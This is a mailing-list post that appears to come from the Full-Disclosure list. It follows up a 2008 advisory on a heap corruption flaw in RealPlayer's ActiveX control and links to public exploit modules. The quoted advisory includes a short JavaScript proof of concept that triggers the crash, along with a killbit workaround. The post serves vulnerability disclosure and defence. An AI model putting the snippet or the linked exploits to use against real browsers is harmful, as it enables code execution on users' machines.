-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Now that this is patched...
http://milw0rm.com/exploits/5332 http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/ browser/realplayer_console.rb Elazar On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad <[EMAIL PROTECTED]> wrote: >Who: >Real Networks >http://www.real.com > >What: >Real Networks Real Player is a popular media player. > >How: >Real Player utilizes an ActiveX control to play content within the >users browser. > >rmoc3260.dll version 6.0.10.45 >{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93} >{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA} > >It is possible to modify heap blocks after they are freed and >overwrite certain registers, possibly allowing code execution. >Like >so: > >------------ >var buf = ''; >while (buf.length < 1005) buf = buf + 'A'; > >m = obj.Console; >obj.Console = buf; >obj.Console = m > >//repeat >m = obj.Console; >obj.Console = buf; >obj.Console = m --> Should crash here >------------- > >Workaround: >Set the killbit for this control. See >http://support.microsoft.com/kb/240797 > >Fix: >No official fix known > >Exploit: >Working on it > >Elazar -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQECAAYFAkfyWNoACgkQi04xwClgpZgyVgP+N7kKGC7cD/1qnnauXIi30j+fmEbK sIe+tOWjTSUKcoTZsoFLiQYd3tKu/t+mauZSi1msUaPgjHu1Or/laRU3Wgw008lnLAmC lT4O/tjlZP6luuzxCHyDrY6p5ze4sb4uDukKnGVHqpNMDoK/s0TFD/fZiaBdc7ZFvL9o 4Y6w7ZY= =IpM9 -----END PGP SIGNATURE----- -- Click here for free info on Graduate Degrees. http://tagline.hushmail.com/fc/Ioyw6h4eSposuNJokZ1ABDCgGd9ckObZCsDzUVQlPhlov4Mrkal8uM/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
